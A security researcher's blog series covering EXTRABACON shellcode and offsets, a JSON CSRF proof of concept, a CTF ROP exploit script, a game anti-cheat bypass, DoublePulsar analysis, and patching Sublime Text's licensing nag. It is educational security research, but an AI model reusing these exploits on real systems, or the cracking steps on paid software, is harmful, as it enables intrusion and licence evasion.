
Removing Sublime Text Nag Window

8 September 2016 at 15:08
I contemplated releasing this blog post earlier, and now that everyone has moved on from Sublime Text to Atom there's really no reason not to push it out. This is posted purely for educational purposes.

Everyone who has used the free version of Sublime Text knows that when you go to save a file, it will randomly show a popup asking you to buy the software. This is known as a "nag window".



The first time I saw it, I knew it had to be cracked. Just pop open the sublime_text.exe file in IDA Pro and search for the string.



We find a match, and IDA tells us where it is cross referenced.



We open the function that uses these .rdata bytes and see that it checks some globals, and performs a call to rand(). If any of the checks fail it will display the popup. The function itself is only about 20 lines of pretty basic assembly but we decompile it anyway because the screenshot is cooler that way.



We open the hex view to see what the hex code for the start of the function looks like.



Next we open sublime_text.exe in Hex Workshop and search for the hex string that matches the assembly.



Finally, we patch the beginning of the function with the assembly opcode c3, which will cause the function to immediately return.



After saving, there will be no more nag window. As an exercise to the reader, try to make Sublime think you have a registered copy.

Reverse Engineering Cisco ASA for EXTRABACON Offsets

17 September 2016 at 23:59

Update Sept. 24: auxiliary/admin/cisco/cisco_asa_extrabacon is now in the Metasploit master repo. There is support for the original ExtraBacon leak and ~20 other newer versions.

Update Sept. 22: Check this GitHub repo for ExtraBacon 2.0, improved Python code, a Lina offset finder script, support for a few more 9.x versions, and a Metasploit module.

Background 

On August 13, 2016 a mysterious Twitter account (@shadowbrokerss) appeared, tweeting a PasteBin link to numerous news organizations. The link described the process for an auction to unlock an encrypted file that claimed to contain hacking tools belonging to the Equation Group. Dubbed last year by Kaspersky Lab, Equation Group are sophisticated malware authors believed to be part of the Office of Tailored Access Operations (TAO), a cyber-warfare intelligence-gathering unit of the National Security Agency (NSA). As a show of good faith, a second encrypted file and corresponding password were released, with tools containing numerous exploits and even zero-day vulnerabilities.

One of the zero-day vulnerabilities released was a remote code execution in the Cisco Adaptive Security Appliance (ASA) device. The Equation Group's exploit for this was named EXTRABACON. Cisco ASAs are commonly used as the primary firewall for many organizations, so the EXTRABACON exploit release raised many eyebrows.

At RiskSense we had spare ASAs lying around in our red team lab, and my colleague Zachary Harding was extremely interested in exploiting this vulnerability. I told him if he got the ASAs properly configured for remote debugging I would help in the exploitation process. Of course, the fact that there are virtually no exploit mitigations (e.g. ASLR, stack canaries, etc.) on Cisco ASAs may have weighed in on my willingness to help. He configured two ASAs: one running version 8.4(3) (which had EXTRABACON exploit code), and one running version 9.2(3), which we would target to write new code.

This blog post will explain the methodology for the following submissions to exploit-db.com:

There is detailed information about how to support other versions of Cisco ASA for the exploit. Only a few versions of 8.x were in the exploit code; however, the vulnerability affected all versions of ASA, including all of 8.x and 9.x. This post also contains information about how we were able to decrease the Equation Group shellcode from 2 stages containing over 200 bytes to 1 stage of 69 bytes.

Understanding the Exploit 

Before we can begin porting the exploit to a new version, or improving the shellcode, we first need to know how the exploit works.

This remote exploit is your standard stack buffer overflow, caused by sending a crafted SNMP packet to the ASA. From the internal network, exploitation is pretty much guaranteed with the default configuration. We were also able to confirm the attack can originate from the external network in some setups.

Hijacking Execution 

The first step in exploiting a 32-bit x86 buffer overflow is to control the EIP (instruction pointer) register. In x86, a function CALL pushes the current EIP location to the stack, and a RET pops that value and jumps to it. Since we overflow the stack, we can change the return address to any location we want.

In the shellcode_asa843.py file, the first interesting thing to see is:

my_ret_addr_len = 4
my_ret_addr_byte = "\xc8\x26\xa0\x09"
my_ret_addr_snmp = "200.38.160.9"

This is an offset in 8.4(3) to 0x09a026c8. As this was a classic stack buffer overflow exploit, my gut told me this was where we would overwrite the RET address, and that there would be a JMP ESP (jump to stack pointer) here. Sometimes your gut is right:

The vulnerable file is called "lina". And it's an ELF file; who needs IDA when you can use objdump?

Stage 1: "Finder" 

The Equation Group shellcode is actually 3 stages. After we JMP ESP, we find our EIP in the "finder" shellcode.

finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"

This code finds some pointer on the stack and jumps to it. The pointer contains the second stage.

We didn't do much investigating here as it was the same static offsets for every version. Our improved shellcode also uses this first stage.
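
Each _byte/_snmp pair in these snippets is the same data in two encodings: the payload travels inside an SNMP OID, so every byte appears as one dotted-decimal component. Here is a minimal Python sketch of that relationship. The helper names are ours for illustration and do not come from the leaked code.

```python
import struct

def bytes_to_snmp(raw):
    """Render each byte as one dotted-decimal OID component."""
    return ".".join(str(b) for b in bytearray(raw))

def snmp_to_bytes(oid):
    """Inverse of bytes_to_snmp()."""
    return bytes(bytearray(int(part) for part in oid.split(".")))

ret_addr = b"\xc8\x26\xa0\x09"
finder = b"\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"

print(bytes_to_snmp(ret_addr))                  # 200.38.160.9
print(hex(struct.unpack("<I", ret_addr)[0]))    # 0x9a026c8 (little-endian address)
print(bytes_to_snmp(finder))                    # 139.124.36.20.139.7.255.224.144
```

Reading the four return address bytes as a little-endian integer gives back 0x09a026c8, the JMP ESP location in 8.4(3).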

Stage 2: "Preamble" 

Observing the main Python source code, we can see how the second stage is made:

        wrapper = sc.preamble_snmp
        if self.params.msg:
            wrapper += "." + sc.successmsg_snmp
        wrapper += "." + sc.launcher_snmp
        wrapper += "." + sc.postscript_snmp

Ignoring successmsg_snmp (as the script --help text says DO NOT USE), the following shellcode is built:

It seems like a lot is going on here, but it's pretty simple.

  1. A "safe" return address is XORed by 0xa5a5a5a5
    1. unnecessary, yet this type of XOR is everywhere. The shellcode can contain null bytes so we don't need a mask
  2. Registers smashed by the stack overflow are fixed, including the frame base pointer (EBP)
  3. The fixed registers are saved (PUSHA = push all)
  4. A pointer to the third stage "payload" (to be discussed soon) is found on the stack
    • This offset gave us trouble. Luckily our improved shellcode doesn't need it!
  5. Payload is called, and returns
  6. The saved registers are restored (POPA = pop all)
  7. The shellcode returns execution to the "safe" location, as if nothing happened

I'm guessing the safe return address is where the buffer overflow would have returned if not exploited, but we haven't actually investigated the root cause of the vulnerability, just how the exploit works. This is probably the most elusive offset we will need to find, and IDA does not recognize this part of the code section as part of a function.

If we follow the function that is called before our safe return, we can see why there are quite a few registers that need to be cleaned up.

These registers also get smashed by our overflow. If we don't fix the register values, the program will crash. Luckily the cleanup shellcode can be pretty static, with only the EBP register changing a little bit based on how much stack space is used.

Stage 3: "Payload" 

The third stage is where the magic finally happens. Normally shellcode, as it is aptly named, spawns a shell. But the Equation Group has another trick up its sleeve. Instead, we patch two functions, which we called "pmcheck()" and "admauth()", to always return true. With these two functions patched, we can log onto the ASA admin account without knowing the correct password.

Note: this is for payload "pass-disable". There's a second payload, "pass-enable", which re-patches the bytes. So after you log in as admin, you can run a second exploit to clean up your tracks.

For this stage, there is payload_PMCHECK_DISABLE_byte and payload_AAAADMINAUTH_DISABLE_byte. These two shellcodes perform the same overall function, just for different offsets, with a lot of code reuse.

Here is the Equation Group PMCHECK_DISABLE shellcode:

There's some shellcode trickery going on, but here are the steps being taken:

  1. First, the syscall to mprotect() marks a page of memory as read/write/exec, so we can patch the code
  2. Next, we jump forward to right before the end of the shellcode
    • The last 3 lines of the shellcode contain the code to "always return true"
  3. The call instruction puts the current address (where patch code is) on the stack
  4. The patch code address is pop'd into esi and we jump backwards
  5. rep movs copies 4 bytes (ecx) from esi (source index) to edi (destination index), then we jump to the admauth() patch

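The following is functionally equivalent C code:

void *const PMCHECK_BOUNDS = (void *)0x954c000;          /* page containing pmcheck() */
uint32_t *const PMCHECK_OFFSET = (uint32_t *)0x954cfd0;  /* start of pmcheck() */

const uint32_t PATCH_BYTES = 0xc340c031;                 /* little-endian: 31 c0 40 c3 */

/* make the page writable, then overwrite the first 4 bytes of pmcheck() */
sys_mprotect(PMCHECK_BOUNDS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
*PMCHECK_OFFSET = PATCH_BYTES;

In this case, PATCH_BYTES (PMCHECK_BYTES in the shellcode) will be "always return true".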

xor eax, eax   ; set eax to 0  -- 31 c0
inc eax        ; increment eax -- 40
ret            ; return        -- c3
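
To see why the 32-bit constant 0xc340c031 corresponds to these three instructions, recall that x86 stores integers little-endian, so the low byte lands first in memory. This quick Python check is only a sanity test of the byte order, not part of the exploit:

```python
import struct

PATCH_BYTES = 0xc340c031

raw = struct.pack("<I", PATCH_BYTES)   # "<I" = little-endian unsigned 32-bit
print(" ".join("%02x" % b for b in bytearray(raw)))   # 31 c0 40 c3
```

The bytes come out in execution order: xor eax, eax (31 c0), inc eax (40), ret (c3).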

Yes, my friends who are fluent in shellcode, the assembly is extremely verbose just to write 4 bytes to a memory location. Here is how we summarized everything from loc_00000025 to the end in the improved shellcode:

mov dword [PMCHECK_OFFSET], PMCHECK_BYTES

In the inverse operation, pass-enable, we will simply patch the bytes to their original values.

Finding Offsets 

So now that we've reverse engineered the shellcode, we know what offsets we need to patch to port the exploit to a new Cisco ASA version:

  1. The RET smash, which should be JMP ESP (ff e4) bytes
  2. The "safe" return address, to continue execution after our shellcode runs
  3. The address of pmcheck()
  4. The address of admauth()

RET Smash 

We can set the RET smash address to anywhere JMP ESP (ff e4) opcodes appear in an executable section of the binary. There is no shortage of the actual instruction in 9.2(3).

Any of these will do, so we just picked a random one.
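
As a rough illustration of the search, here is a small Python sketch that lists every occurrence of a byte sequence in a blob. It is an assumption-laden stand-in for what objdump or a gadget finder does: the sample bytes are synthetic, and with a real binary you would read an executable section and add its load address to each offset.

```python
def find_all(blob, needle):
    """Return every offset in blob at which needle occurs."""
    offsets = []
    pos = blob.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(needle, pos + 1)
    return offsets

JMP_ESP = b"\xff\xe4"

# Synthetic stand-in for the contents of an executable section.
sample = b"\x90\x90\xff\xe4\xc3\x31\xc0\xff\xe4"
print(find_all(sample, JMP_ESP))   # [2, 7]
```

The same kind of byte search applies to any signature, such as the first bytes of a known function dumped from another version.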

Safe Return Address 

This is the location to safely return execution to after the shellcode runs. As mentioned, this part of the code isn't actually recognized as a function by IDA, and also the same trick we'll use for the Authentication Functions (searching the assembly with ROPgadget) doesn't work here.

The offset in 8.4(3) is 0xad457e33 ^ 0xa5a5a5a5 = 0x8e0db96

This contains a unique signature of common bytes we can grep for in 9.2(3).

Our safe return address offset is at 0x9277386.
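
The XOR arithmetic for the 8.4(3) value is easy to double-check in Python. The function name here is ours; the mask and the masked value are the ones quoted above.

```python
MASK = 0xa5a5a5a5

def unmask(value):
    """XOR is its own inverse, so this both masks and unmasks."""
    return value ^ MASK

print(hex(unmask(0xad457e33)))   # 0x8e0db96
```

Since our improved shellcode drops the mask entirely, the 9.2(3) address can be used as-is.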

Authentication Functions 

Finding the offsets for pmcheck() and admauth() is pretty simple. The offsets in 8.4(3) are not XORed by 0xa5a5a5a5, but the page alignment for sys_mprotect() is.

We'll dump the pmcheck() function from 8.4(3).

We have the bytes of the function, so we can use the Python ROPgadget tool from Jonathan Salwan to search for those bytes in 9.2(3).

It's a pretty straightforward process, which can be repeated for admauth() offsets. Note that during this process, we get the unpatch bytes needed for the pass-enable shellcode.

Finding the page alignment boundaries for these offsets (for use in sys_mprotect()) is easy as well, just floor to the nearest 0x1000.
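
Flooring to a page boundary is a single bit mask. This sketch assumes the 0x1000 page size used in the sys_mprotect() call and checks it against the 8.4(3) pmcheck() values from the C code earlier:

```python
PAGE_SIZE = 0x1000

def page_floor(addr):
    """Clear the low 12 bits to get the start of the containing page."""
    return addr & ~(PAGE_SIZE - 1)

print(hex(page_floor(0x954cfd0)))   # 0x954c000
```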

Improving the Shellcode 

We were able to combine the Equation Group stages "preamble" and "payload" into a single stage by rewriting the shellcode. Here is a list of ways we shortened the exploit code:

  1. Removed all XOR 0xa5a5a5a5 operations, as null bytes are allowed
  2. Reused code for the two sys_mprotect() calls
  3. Used a single mov operation instead of jmp/call/pop/rep movs to patch the code
  4. General shellcode size optimization tricks (performing the same tasks with ops that use fewer bytes)

The lackadaisical approach to the shellcode, as well as the Python code, came as a bit of a surprise as the Equation Group is probably the most elite APT on the planet. There's a lot of cleverness in the code though, and whoever originally wrote it obviously had to be competent. To me, it appears the shellcode is kind of an off-the-shelf solution to solving generic problems, instead of being custom tailored for the exploit.

By changing the shellcode, we gained one enormous benefit. We no longer have to find the stack offset that contains a pointer to the third stage. This step gave us so much trouble that we started experimenting with using an egg hunter. We know that the stack offset to the third stage was a bottleneck for SilentSignal as well (Bake Your Own EXTRABACON). But once we understood the overall operation of all stages, we were happy to just reduce the bytes and keep everything in the one stage. Not having to find the third stage offset makes porting the exploit very simple.

Future Work 

The Equation Group appeared to have generated their shellcode. We have written a Python script that will auto-port the code to different versions. We find offsets using similar heuristics to what ROPgadget offers. Of course, you can't trust a tool 100% (in fact, some of the Equation Group shellcode crashes certain versions). So we are testing each version.

We're also porting the Python code to Ruby, so the exploit will be part of Metasploit. Our Metasploit module will contain the new shellcode for all Shadow Brokers versions, as well as offsets for numerous versions not part of the original release, so keep an eye out for it.

CSRF Attack for JSON-encoded Endpoints

19 September 2016 at 16:15

Sometimes you see a possible Cross-Site Request Forgery (CSRF) attack against JSON endpoints, where data is a JSON blob instead of x-www-form-urlencoded data.

Here is a PoC that will send a JSON CSRF.

<html> 
    <form action="http://127.0.0.1/json" method="post" 
        enctype="text/plain" name="jsoncsrf"> 
        <input 
            name='{"json":{"nested":"obj"},"list":["0","1"]}' 
            type='hidden'> 
    </form> 
    <script>
         document.jsoncsrf.submit()
    </script>
</html>

You can use any JSON including nested objects, lists, etc.

The previous example adds a trailing equal sign =, which will break some parsers. You can get around it with:

<input name='{"json":"data","extra' value='":"stuff"}' 
    type='hidden'> 

Which will give the following JSON:

{"json":"data","extra=":"stuff"} 
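
To make the difference concrete, here is a Python sketch of what the server receives in each case. It assumes the browser serializes a text/plain form field as name=value followed by a line break, and it uses Python's json module as a stand-in for a strict server-side parser. The helper names are made up for illustration.

```python
import json

def text_plain_body(name, value=""):
    """Request body for a single text/plain form field."""
    return name + "=" + value + "\r\n"

def parses(body):
    """True if a strict JSON parser accepts the body."""
    try:
        json.loads(body)
        return True
    except ValueError:   # json.JSONDecodeError is a subclass of ValueError
        return False

naive = text_plain_body('{"json":{"nested":"obj"},"list":["0","1"]}')
split = text_plain_body('{"json":"data","extra', '":"stuff"}')

print(parses(naive))       # False: the trailing "=" is extra data
print(json.loads(split))   # {'json': 'data', 'extra=': 'stuff'}
```

The split version works because the unavoidable = is swallowed into a throwaway key name.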

Hack the Vote CTF "IRS" Solution

6 November 2016 at 23:00

RPISEC ran a capture the flag called Hack the Vote 2016 that was themed after the election. In the competition was the "IRS" challenge by pigeon.

IRS challenge clue:

Good day fellow Americans. In the interest of making filing your tax returns as easy and painless as possible, we've created this nifty lil' program to better serve you! Simply enter your name and file away! And don't you worry, everyone's file is password protected ;)

We get a pwnable x86 ELF Linux binary with a non-executable stack. There are also details for a server to ncat to in order to exploit it.

The program contains about 10 functions that are relatively straightforward about what they do just going off the strings. Exploring the program, there is a blatant address leak when there is an attempt to create more than 5 total users in the system.

This %p is given to puts(). It dereferences to a pointer address that is the start of an array of structs which hold IRS tax return data. Here is the initialization code for Trump's struct:

Note that Trump's password is "not_the_flag" here, but on the server it will be the flag.

Preceding Trump's struct construction is a call to malloc() with 108 bytes, and throughout the program we only see 4 distinct fields. So the completed struct most likely is:

struct IRS_Data
{
    char name[50];
    char pass[50];
    int32_t income;
    int32_t deductibles;
};
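
The guessed layout can be checked against the 108-byte malloc() with ctypes. This is only a sanity check of the arithmetic; the field names are our guesses, as in the struct above, and pass is renamed because it is a Python keyword.

```python
import ctypes

class IRSData(ctypes.Structure):
    _fields_ = [
        ("name", ctypes.c_char * 50),
        ("pass_", ctypes.c_char * 50),    # "pass" is a Python keyword
        ("income", ctypes.c_int32),
        ("deductibles", ctypes.c_int32),
    ]

print(ctypes.sizeof(IRSData))    # 108
print(IRSData.income.offset)     # 100
```

The two 50-byte arrays end at offset 100, which is already 4-byte aligned, so no padding is needed and the total matches the allocation.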

In a function which I named edit_tax_return(), there is a call to gets(). This is a highly vulnerable C function that writes to a buffer from stdin with no constraints on length, and thus should probably never be used.

The exploitation process can be pretty simple if you take advantage of other functions present in the binary.

  1. Create enough users to leak the user array pointer
  2. Overflow the gets() in edit_tax_return() with a ROP chain
  3. ROP #1 calls view_tax_return() with the leaked pointer and index 0 (a.k.a. Trump)
  4. ROP #2 cleanly returns back to the start of main()

#!/usr/bin/env python2
from pwn import *

#r = remote("irs.pwn.republican", 4127)
r = process('./irs.4ded.3360.elf')

r.send("1\n"*21)                # create a bunch of fake users
r.recvuntil("0x")               # get the leaked %p address

database_addr = int(r.recvline().strip(), 16)
log.success("Got leaked address %08x" % database_addr)

r.send("3\n"+"1\n"*4)           # edit a known user record

overflow = "A"*25
overflow += p32(0x0804892C)     # print_tax_return(pDB, i)
overflow += p32(0x08048a39)     # main(void), safe return
overflow += p32(database_addr)  # pDB
overflow += p32(0x00000000)     # i

r.send(overflow + "\n")         # 08048911    call    gets

r.recvuntil("Password: ")       # print_tax_return() Trump password

flag = r.recvline().split(" ")[0]
log.success(flag)

Hack the Vote CTF "The Wall" Solution

6 November 2016 at 23:01

RPISEC ran a capture the flag called Hack the Vote 2016 that was themed after the election. In the competition was "The Wall" challenge by itszn.

The Wall challenge clue:

The Trump campaign is running a trial of The Wall plan. They want to prove that no illegal immigrants could get past it. If that goes as planned, us here at the DNC will have a hard time swinging some votes in the southern boarder states. We need you to hack system and get past the wall. I heard they have put extra protections into place, but we think you can still do it. If you do get into America, there should be a flag somewhere in the midwest that you can have. You will be US "citizen" after all.

The challenge link was a tarball with a bunch of directories. Inside the /bin/ folder was an x64 ELF called "minetest", which is a Minecraft clone. I was pleased to see this was a video game challenge, having a fair amount of infamy for hacking online games in my past lives.

When you run the game, you log onto a server and are greeted with Trump's wall. It's yuuuge, spanning infinitely across the horizontal plane.

So the goal must be to get around this wall and into America. I tried a few naive approaches, as I just wanted to get something like a simple warp or run-through-wall type of cheat running, but alas there was an anti-cheat built into the game.

No problem, it wouldn't be the first time I've had to defeat an anti-cheat system. I started reversing a function called Client::handleCommand_CheatChallange() (sic):

I deduced this function was reading /proc/self/maps and running a SHA1 function on it. At first I was going to just overwrite this function to make it give the expected SHA1, but then I started backing up and found this function was only called when you first joined the server. So all that was needed to bypass the anti-cheat was to delay loading whatever cheat I planned to use until after joining.

Poking around the game and binary some more, I noticed there was a "fly" mode, that my client didn't have the privilege from the server for:

Well, my client still has the code for flying even if the server says I don't have the privilege. I found a function called Client::checkLocalPrivilege(). The function takes a C++ std::string of a privilege (such as fly) and returns a bool.

Yea, this guy's doing way too much work for me. Time to patch it with the following assembly:

inc eax   ; ff c0
ret       ; c3  
nop       ; 90

This will make the function always return true when my client checks if I have access to a certain privilege. After logging into the server, I attached to my client with GDB and patched my new assembly into the privilege check function:

Now that I could fly, I noticed the wall also grew infinitely vertical. Fortunately, from way up high I was able to glitch through the wall.

I made it!

I wandered through the desert for 40 days and 40 night cycles.

No really, I wandered a long time. I should also mention disabling the privilege checks gives access to a speed hack, but it was a little glitchy and the server kept warping me backwards.

I was starting to get worried, when all of a sudden I saw beautiful Old Glory off in the distance.

Overflow Exploit Pattern Generator - Online Tool

27 November 2016 at 05:25

Metasploit's pattern generator is a great tool, but Ruby's startup time is abysmally slow. Out of frustration, I made this in-browser online pattern generator written in JavaScript.

For the unfamiliar, this tool will generate a non-repeating pattern. You drop it into your exploit proof of concept. You crash the program, and see what the value of your instruction pointer register is. You type that value in to find the offset of how big your buffer should be overflowed before you hijack execution.
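
For reference, the idea fits in a few lines of Python. This is a sketch of the Metasploit-style pattern (uppercase, lowercase, digit triples), not the JavaScript behind the online tool, and the function names are ours.

```python
import itertools
import string
import struct

def pattern_create(length):
    """Build a Metasploit-style cyclic pattern: Aa0Aa1Aa2..."""
    triples = itertools.product(string.ascii_uppercase,
                                string.ascii_lowercase,
                                string.digits)
    pattern = "".join("".join(t) for t in triples)
    return pattern[:length]

def pattern_offset(eip, length=8192):
    """Locate a 32-bit little-endian register value inside the pattern."""
    needle = struct.pack("<I", eip).decode("ascii")
    return pattern_create(length).find(needle)   # -1 if not found

print(pattern_create(12))           # Aa0Aa1Aa2Aa3
print(pattern_offset(0x41336141))   # 9
```

Here a crashed EIP of 0x41336141 is the bytes "Aa3A" in memory, which first appear 9 bytes into the pattern.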

See also: Obfuscated String/Shellcode Generator - Online Tool

MS17-010 (SMB RCE) Metasploit Scanner Detection Module

19 April 2017 at 03:28

Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar infection detection to this module.

During the first Shadow Brokers leak, my colleagues at RiskSense and I reverse engineered and improved the EXTRABACON exploit, which I wrote a feature about for PenTest Magazine. Last Friday, Shadow Brokers leaked FuzzBunch, a Metasploit-like attack framework that hosts a number of Windows exploits not previously seen. Microsoft's official response says these exploits were fixed up in MS17-010, released in mid-March.

Yet again I find myself tangled up in the latest Shadow Brokers leak. I actually wrote a scanner to detect MS17-010 about 2-3 weeks prior to the leak, judging by the date on my initial pull request to Metasploit master. William Vu, of Rapid7 (and whom coincidentally I met in person the day of the leak), added some improvements as well. It was pulled into the master branch on the day of the leak. This module can be used to scan a network range (RHOSTS) and detect if the patch is missing or not.

Module Information Page
https://rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010

Module Source Code
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

My scanner module connects to the IPC$ tree and attempts a PeekNamedPipe transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. After the patch, Win10 returns "STATUS_ACCESS_DENIED" and other Windows versions "STATUS_INVALID_HANDLE". In case none of these are detected, the module says it was not able to detect the patch level (I haven't seen this in practice).
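
The decision logic boils down to a three-way mapping. The sketch below is Python for illustration only, not the module's Ruby source; the constants are the standard NTSTATUS values for the names mentioned above, and the verdict strings are our own.

```python
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_INVALID_HANDLE = 0xC0000008

def classify(nt_status):
    """Map the PeekNamedPipe response status to a patch verdict."""
    if nt_status == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"       # MS17-010 patch is missing
    if nt_status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "patched"          # Win10 / other Windows versions
    return "unknown"              # could not determine patch level

print(classify(0xC0000205))   # vulnerable
```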

IPC$ is the "InterProcess Communication" share, which generally does not require valid SMB credentials in default server configurations. Thus this module can usually be run as an unauthenticated scan, as it can log on as the user "\" and connect to IPC$.

This is the most important patch for Windows in almost a decade, as it fixes several remote vulnerabilities for which there are now public exploits (EternalBlue, EternalRomance, and EternalSynergy).

These are highly complex exploits, but the FuzzBunch framework essentially makes the process as easy as point and shoot. EternalRomance does a ridiculous amount of "grooming", aka remote heap feng shui. In the case of EternalBlue, it spawns numerous threads and simultaneously exploits SMBv1 and SMBv2, and seems to talk Cairo, an undocumented SMB LanMan alternative (only known because of the NT4 source code leaks). I haven't gotten around to looking at EternalSynergy yet.

I am curious to learn more, but have too many side projects at the moment to spend my full efforts investigating further. And unlike EXTRABACON, I don't see any "obvious" improvements other than I would like to see an open source version.

DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis

22 April 2017 at 04:59

One week ago today, the Shadow Brokers (an unknown hacking entity) leaked the Equation Group's (NSA) FuzzBunch software, an exploitation framework similar to Metasploit. In the framework were several unauthenticated, remote exploits for Windows (such as the exploits codenamed EternalBlue, EternalRomance, and EternalSynergy). Many of the vulnerabilities that are exploited were fixed in MS17-010, perhaps the most critical Windows patch in almost a decade.

Side note: You can use my MS17-010 Metasploit auxiliary module to scan your networks for systems missing this patch (uncredentialed and non-intrusive). If a missing patch is found, it will also check for an existing DoublePulsar infection.

Introduction

For those unfamiliar, DoublePulsar is the primary payload used in SMB and RDP exploits in FuzzBunch. Analysis was performed using the EternalBlue SMBv1/SMBv2 exploit against Windows Server 2008 R2 SP1 x64.

The shellcode, in tl;dr fashion, essentially performs the following:

  • Step 0: Shellcode sorcery to determine if x86 or x64, and branches as such.
  • Step 1: Locates the IDT from the KPCR, and traverses backwards from the first interrupt handler to find ntoskrnl.exe base address (DOS MZ header).
  • Step 2: Reads ntoskrnl.exe's exports directory, and uses hashes (similar to usermode shellcode) to find ExAllocatePool/ExFreePool/ZwQuerySystemInformation functions.
  • Step 3: Invokes ZwQuerySystemInformation() with the enum value SystemQueryModuleInformation, which loads a list of all drivers. It uses this to locate Srv.sys, an SMB driver.
  • Step 4: Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.
  • Step 5: With secondary DoublePulsar payloads (such as inject DLL), the hook function sees if you "knock" correctly and allocates an executable buffer to run your raw shellcode. All other requests are forwarded directly to the original SrvTransactionNotImplemented() function. "Burning" DoublePulsar doesn't completely erase the hook function from memory, just makes it dormant.

After exploitation, you can see the missing symbol in the SrvTransaction2DispatchTable. There are supposed to be 2 handlers here with the SrvTransactionNotImplemented symbol. This is the DoublePulsar backdoor (array index 14):

Honestly, you don't usually wake up in the morning and feel like spending time dissecting ~3600 some odd bytes of Ring-0 shellcode, but I felt productive today. Also I was really curious about this payload and didn't see many details about it outside of Countercept's analysis of the DLL injection code. But I was interested in how the initial SMB backdoor is installed, which is what this post is about.

Zach Harding, Dylan Davis, and I kind of rushed through it in a few hours in our red team lab at RiskSense. There is some interesting setup in the EternalBlue exploit with the IA32_LSTAR syscall MSR (0xc0000082) and a region of the Srv.sys containing FEFEs, but I will instead focus on just the raw DoublePulsar methodology... Much like the EXTRABACON shellcode, this one is crafty and does not simply spawn a shell.

Detailed Shellcode Analysis

Inside the Shadow Brokers dump you can find DoublePulsar.exe and EternalBlue.exe. When you use DoublePulsar in FuzzBunch, there is an option to spit its shellcode out to a file. We found out this is a red herring, and that the EternalBlue.exe contained its own payload.

Step 0: Determine CPU Architecture

The main payload is quite large because it contains shellcode for both x86 and x64. The first few bytes use opcode trickery to branch to the correct architecture (see my previous article on assembly architecture detection).

Here is how x86 sees the first few bytes.

You'll notice that inc eax means the je (jump equal/zero) instruction is not taken. What follows is a call and a pop, which is to get the current instruction pointer.

And here is how x64 sees it:

The inc eax byte is instead the REX prefix for a NOP. So the zero flag is still set from the xor eax, eax operation. Since x64 has RIP-relative addressing it doesn't need to get the RIP register.

The x86 payload is essentially the same thing as the x64 so this post only focuses on x64.

Since the NOP was a true NOP on x64, I overwrote the 40 90 with cc cc (int 3) using a hex editor. Interrupt 3 is how debuggers set software breakpoints.

Now when the system is exploited, our attached kernel debugger will automatically break when the shellcode starts executing.

Step 1: Find ntoskrnl.exe Base Address

Once the shellcode figures out it is x64 it begins to search for the base of ntoskrnl.exe. This is done with the following stub:

Fairly straightforward code. In user mode, the GS segment for x64 contains the Thread Information Block (TIB), which holds the Process Environment Block (PEB), a struct which contains all kinds of information about the current running process. In kernel mode, this segment instead contains the Kernel Processor Control Region (KPCR), a struct which at offset zero actually contains the current process PEB.

This code grabs offset 0x38 of the KPCR, which is the "IdtBase" and contains a pointer to a KIDTENTRY64 struct. Those familiar with the x86 family will know this is the Interrupt Descriptor Table.

At offset 4 into the KIDTENTRY64 struct you can get a function pointer to the interrupt handler, which is code defined inside of ntoskrnl.exe. From there it searches backwards in memory in 0x1000 increments (page size) for the .exe DOS MZ header (cmp bx, 0x5a4d).
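
The backwards search can be modeled in a few lines of Python. This is a simulation over a fake buffer, not kernel code: the memory layout and handler address are invented, and the lower bound check exists only because our toy address space starts at zero.

```python
import struct

PAGE_SIZE = 0x1000
MZ_MAGIC = 0x5a4d   # "MZ" read as a little-endian 16-bit word

def find_image_base(memory, addr):
    """Walk back one page at a time from addr until a page starts with MZ."""
    page = addr & ~(PAGE_SIZE - 1)
    while page >= 0:
        (word,) = struct.unpack_from("<H", memory, page)
        if word == MZ_MAGIC:
            return page
        page -= PAGE_SIZE
    return None

# Fake 5-page "address space" with an image header at the start of page 1.
memory = bytearray(5 * PAGE_SIZE)
memory[PAGE_SIZE:PAGE_SIZE + 2] = b"MZ"
handler = 3 * PAGE_SIZE + 0x123      # pretend interrupt handler address

print(hex(find_image_base(memory, handler)))   # 0x1000
```

The trick works because PE images are loaded on page boundaries, so only the first two bytes of each page need to be compared.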

Step 2: Locate Necessary Function Pointers

Once you know where the MZ header of a PE file is, you can peek into defined offsets for the export directory and get the relative virtual address (RVA) of any function you want. Userland shellcode does this all the time, usually to find necessary functions it needs out of ntdll.dll and kernel32.dll. Just like most userland shellcode, this ring 0 shellcode also uses a hashing algorithm instead of hard-coded strings in order to find the necessary functions.

The following functions are found:

ExAllocatePool can be used to create regions of executable memory, and ExFreePool can clean it up when done. These are important so the shellcode can allocate space for its hooks and other functions. ZwQuerySystemInformation is important in the next step.

Step 3: Locate Srv.sys SMB Driver

A feature of ZwQuerySystemInformation is a constant named SystemQueryModuleInformation, with the value 0xb. This gives a list of all loaded drivers in the system.

The shellcode then searches this list for two different hashes, and it lands on Srv.sys, which is one of the main drivers that SMB runs on.

The process here is basically equivalent to getting PEB->Ldr in userland, which lets you iterate loaded DLLs. Instead, it was looking for the SMB driver.

Step 4: Patch the SMB Trans2 Dispatch Table

Now that the DoublePulsar shellcode has the main SMB driver, it iterates over the .sys PE sections until it gets to the .data section.

Inside of the .data section is generally global read/write memory, and stored here is the SrvTransaction2DispatchTable, an array of function pointers that handle different SMB tasks.

The shellcode allocates some memory and copies over the code for its function hook.

Next the shellcode stores the function pointer for the dispatch named SrvTransactionNotImplemented() (so that it can call it from within the hook code). It then overwrites this member inside SrvTransaction2DispatchTable with the hook.

That's it. The backdoor is complete. Now it just returns up its own call stack and does some small cleanup chores.

Step 5: Send "Knock" and Raw Shellcode

